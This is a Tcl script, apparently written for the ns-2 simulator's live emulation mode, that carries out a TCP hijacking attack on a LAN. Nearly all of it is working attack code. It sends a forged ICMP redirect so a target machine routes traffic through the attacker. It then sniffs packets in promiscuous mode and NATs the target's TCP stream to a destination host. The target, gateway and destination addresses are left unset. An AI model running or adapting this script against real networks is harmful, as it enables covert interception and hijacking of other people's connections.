- #
- # TCPHijack -- the idea of this script is to sit on a LAN and
- # send an icmp redirect to our "target" machine. The target is
- # then lead into believing we (the emulating host) are the correct
- # router for the destination.
- # By performing NAT on the TCP stream, we cause the TCP traffic to
- # pass through us on the way to the destination.
- # We need a bogus [unused] IP address on the subnet for this.
- #
- set targetip; # coot
- set dummyip; # bit
- set gwip; # ir40gw
- set dstip; # vangogh.cs.berkeley.edu
- Class TCPHijack
- TCPHijack instproc config ns {
- $self instvar ns_
- set ns_ $ns
- $self maketopo
- $self makeicmp
- $self makeip
- $self makepcap
- $self maketcpnat
- $self makeconnections
- }
- TCPHijack instproc maketopo {} {
- $self instvar ns_ node_
- set node_(icmp) [$ns_ node]
- set node_(ip) [$ns_ node]
- set node_(nat) [$ns_ node]
- set node_(pcap) [$ns_ node]
- $ns_ simplex-link $node_(icmp) $node_(ip) 10Mb 0.002ms DropTail
- $ns_ simplex-link $node_(nat) $node_(ip) 10Mb 0.002ms DropTail
- $ns_ simplex-link $node_(pcap) $node_(nat) 10Mb 0.002ms DropTail
- }
- TCPHijack instproc makeicmp {} {
- $self instvar node_ agent_ ns_
- set agent_(icmp) [new Agent/IcmpAgent]
- $ns_ attach-agent $node_(icmp) $agent_(icmp)
- return $agent_(icmp)
- }
- TCPHijack instproc makepcap {} {
- global targetip dstip dummyip
- $self instvar node_ agent_ ns_
- # pcap for snarfing outbound tcp packets
- # (pkts sent from target to destination)
- set livenet [new Network/Pcap/Live]
- $livenet set promisc_ true
- $livenet open readonly
- $livenet filter "tcp and src $targetip and dst $dstip"
- set agent_(pcapforw) [new Agent/Tap]
- $agent_(pcapforw) network $livenet
- # pcap for snarfing inbound tcp packet
- # (pkts received from destination to dummy)
- set livenet [new Network/Pcap/Live]
- $livenet set promisc_ true
- $livenet open readonly
- $livenet filter "tcp and src $dstip and dst $dummyip"
- set agent_(pcapback) [new Agent/Tap]
- $agent_(pcapback) network $livenet
- $ns_ attach-agent $node_(pcap) $agent_(pcapforw)
- $ns_ attach-agent $node_(pcap) $agent_(pcapback)
- }
- TCPHijack instproc makeip {} {
- $self instvar node_ agent_ ns_
- set livenet [new Network/IP]
- $livenet open writeonly
- set agent_(ip) [new Agent/Tap]
- $agent_(ip) network $livenet
- $ns_ attach-agent $node_(ip) $agent_(ip)
- }
- TCPHijack instproc makeconnections {} {
- $self instvar node_ agent_ ns_
- $ns_ simplex-connect $agent_(icmp) $agent_(ip)
- $ns_ simplex-connect $agent_(snat) $agent_(ip)
- $ns_ simplex-connect $agent_(dnat) $agent_(ip)
- $ns_ simplex-connect $agent_(pcapforw) $agent_(snat)
- $ns_ simplex-connect $agent_(pcapback) $agent_(dnat)
- }
- TCPHijack instproc maketcpnat {} {
- global dummyip targetip
- $self instvar node_ agent_ ns_
- set agent_(snat) [new Agent/NatAgent/TCPSrc]
- $agent_(snat) source $dummyip
- set agent_(dnat) [new Agent/NatAgent/TCPDest]
- $agent_(dnat) destination $targetip
- $ns_ attach-agent $node_(nat) $agent_(snat)
- $ns_ attach-agent $node_(nat) $agent_(dnat)
- }
- TCPHijack instproc sendredirect {} {
- global gwip targetip dstip dummyip
- $self instvar agent_
- $agent_(icmp) send redirect $gwip $targetip $dstip $dummyip
- }
- TCPHijack thobj
- set th "thobj"
- set ns [new Simulator]
- $ns use-scheduler RealTime
- $th config $ns
- $ns at 0.0 "$th sendredirect"
- $ns run